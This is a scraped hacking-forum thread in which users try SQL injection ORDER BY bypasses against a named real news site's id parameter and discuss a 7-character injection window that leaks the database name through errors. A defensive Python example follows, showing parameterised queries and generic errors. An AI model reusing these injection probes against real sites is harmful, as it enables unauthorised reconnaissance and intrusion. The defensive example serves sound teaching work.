Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Order by Pass???
Posted by: xxy
Date: August 21, 2013 03:15PM

http://www.stha.ca/news/index_full.php?id=38 order 1--

http://www.stha.ca/news/index_full.php?id=38' order 11111--+

http://www.stha.ca/news/index_full.php?id=38) order 11111--+

????

Re: Order by Pass???
Posted by: pridzx
Date: September 09, 2013 12:26AM

Thank you for goods.

Re: Order by Pass???
Posted by: firestorm
Date: September 17, 2013 11:14AM

Bad luck.

That's only a 7-character window you have there.
www.stha.ca/news/index_full.php?id=38++++'
=> Error

Anything beyond 7 is kinda neglected.

http://www.stha.ca/news/index_full.php?id=38+++++++'
=> null or something..

So what can you buy in 7 char?

www.stha.ca/news/index_full.php?id=38a()
=> FUNCTION srhb.38a does not exist in.....

Just the db name!

In case of asap, reach me by mail : syed@syedafzal.in

Options: ReplyQuote
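
A defender's view of the behaviour described in the post above, as an added example that is not part of the thread or of the site's code: a length cap on `id` still lets the value reach the SQL parser and an echoed engine error leaks detail, while a strict integer check with a bound parameter and generic errors closes both. The server logic is not shown on the page, so the handlers, table, `MAX_LEN` and the use of an in-memory SQLite database in place of the site's MySQL back end are all assumptions.

```python
import sqlite3

MAX_LEN = 7  # assumed cap, matching the 7-character window described in the post

def make_db():
    """Constructed in-memory table standing in for the site's news table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO news VALUES (38, 'Constructed sample article')")
    return db

def lookup_truncating(db, raw_id):
    """Weak pattern (hypothetical): cap the length, concatenate, echo engine errors."""
    fragment = raw_id[:MAX_LEN]  # truncation is not validation
    try:
        row = db.execute("SELECT title FROM news WHERE id=" + fragment).fetchone()
    except sqlite3.Error as exc:
        return 500, "DB error: %s" % exc  # parser/schema detail reaches the client
    return (200, row[0]) if row else (404, "Not found")

def lookup_hardened(db, raw_id, log):
    """Strict integer check, bound parameter, generic client-facing errors."""
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        log.append("rejected id=%r" % raw_id)  # detail stays in the server log
        return 400, "Bad request"
    try:
        row = db.execute("SELECT title FROM news WHERE id=?", (int(raw_id),)).fetchone()
    except sqlite3.Error as exc:
        log.append("query failed: %s" % exc)
        return 500, "Internal error"
    return (200, row[0]) if row else (404, "Not found")

if __name__ == "__main__":
    db, log = make_db(), []
    # URL-decoded forms of the values in the thread ('+' decodes to a space).
    for value in ("38", "38    '", "38       '", "38a()"):
        print(repr(value), lookup_truncating(db, value), lookup_hardened(db, value, log))
    print(log)
```

The rejected values in `log` are also the detection signal: repeated non-numeric `id` values from one client are worth alerting on.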